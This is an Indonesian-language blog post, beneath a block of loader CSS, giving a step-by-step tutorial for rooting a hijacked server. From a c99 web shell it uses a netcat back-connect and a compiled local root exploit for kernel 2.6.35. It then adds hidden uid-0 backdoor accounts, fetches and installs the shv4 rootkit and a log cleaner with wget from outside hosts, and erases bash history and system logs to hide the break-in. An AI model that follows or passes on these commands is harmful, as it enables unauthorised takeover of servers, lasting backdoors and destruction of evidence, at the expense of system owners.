/* X-Gen Loader */ #xgenloader-screen {z-index:999999;background:#000;width:100%;height:100%;position:fixed !important;position:absolute;top:0;right:0;bottom:0;left:0;text-shadow:none;} /* DEMO 1 */ #horizontal-load body:after { content: ""; z-index: -1; position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: -webkit-radial-gradient(center center, circle cover, rgba(0,0,0,0), rgba(0,0,0,0.5)); background: -moz-radial-gradient(center center, circle cover, rgba(0,0,0,0), rgba(0,0,0,0.5)); background: -ms-radial-gradient(center center, circle cover, rgba(0,0,0,0), rgba(0,0,0,0.5)); background: -o-radial-gradient(center center, circle cover, rgba(0,0,0,0), rgba(0,0,0,0.5)); background: radial-gradient(center center, circle cover, rgba(0,0,0,0), rgba(0,0,0,0.5)); } #horizontal-load .bar { font-size: 20px; width: 10em; height: 1em; position: relative; margin: 100px auto; border-radius: .5em; background: rgba(255,255,255,0.6); box-shadow: 0 0 0 .05em rgba(100,100,100,0.075), 0 0 0 .25em rgba(0,0,0,0.1), inset 0 .1em .05em rgba(0,0,0,0.1), 0 .05em rgba(255,255,255,0.7); } #horizontal-load .bar:after { content: "Please wait."; position: absolute; left: 25%; top: 150%; font-family: 'Carrois Gothic', sans-serif; font-size: 1em; color: #555; text-shadow: 0 .05em rgba(255,255,255,0.7); } #horizontal-load .bar .sphere { border-radius: 50%; width: 1em; height: 100%; background: -webkit-linear-gradient(#eee, #ddd); background: -moz-linear-gradient(#eee, #ddd); background: -ms-linear-gradient(#eee, #ddd); background: -o-linear-gradient(#eee, #ddd); background: linear-gradient(#eee, #ddd); box-shadow: inset 0 .15em .1em rgba(255,255,255,0.3), inset 0 -.1em .15em rgba(0,0,0,0.15), 0 0 .25em rgba(0,0,0,0.3); display: block; -webkit-animation: slide 1.75s ease-in-out infinite alternate; -moz-animation: slide 1.75s ease-in-out infinite alternate; -ms-animation: slide 1.75s ease-in-out infinite alternate; -o-animation: slide 1.75s ease-in-out infinite alternate; animation: slide 1.75s ease-in-out infinite alternate; } @-webkit-keyframes slide { to { margin-left: 90%; } } @-moz-keyframes slide { to { margin-left: 90%; } } @-ms-keyframes slide { to { margin-left: 90%; } } @-o-keyframes slide { to { margin-left: 90%; } } @keyframes slide { to { margin-left: 90%; } }
twitter
googleplus
facebook
Diberdayakan oleh Blogger.

Translate

Assalamualaikum...tutorial kali saya akan membahasa cara root sebuah shell, sebenarnya sih cara root shell sih gampang nah berikut caranya : Pertama Masuk ke c99 kita siapin nc dlo di kompi nah hbs tuh kita backconnect kalo udh berhasil maka akan keluar shell di cmd windows atau linux kita [ kalau kita udh punya akses shell tanpa melalui web lansung aja ke tahap 2 ]setelah ituh kita cukup menanam local root exploitkemudian kita cukup melakukan perintah gcc rooter file-localroot misalnya nama local root exploit kita kernel.2.6.35 gcc rooter kernel.2.6.35 habis perintah itu kita cukup memasukan perintah ./rooter klo udh klo ada respone kita ketik di cmd window kita tadi whoiam atau idmaka akan keluar uid=0(root) gid=0(root) groups=50(ftp) selanjutnya kita : Add login akses root anda---------------------------------------------------------------- 1. Cara I (bukan utk redhat 7.2)/usr/sbin/useradd rampok -u 0 -d / passwd -d rampokpasswd rampok su rampok 2. Cara II kalo mau dapet acces root ketik : /usr/sbin/useradd crit -u 0 g- 0 -d /etc/critabis itu ketik lagipasswd crit wuasu666 Kemudian Add User untuk login shell anda /usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/htmlpasswd htmlfuck666 2X ---> Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan wget http://www.utay-doyan.cc/shv4.tar.gztar -zxvf shv4.tar.gzcd shv4./setup pass yang dimau port yang dimau contoh : --> ./setup wuasu 7000cd / wget http://cyberborneo.b0x.com/cleaner.tgztar -zxvf cleaner.tgzcd cleaner./install Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak rm -rf cleaner.tgz rm -rf shv4.tar.gz -*------*- ---> Hapus jejak ngeroot anda ketik perintah berikut: rm -f /.bash_history /root/.bash_history /var/log/messagesln -s /devoryln -s /dev/null /root/.bash_historytouch /var/log/messageschmod 600 /var/log/messagesrm -rf /var/log/lastlogcat > /var/log/lastlogctrl d
 

About This Template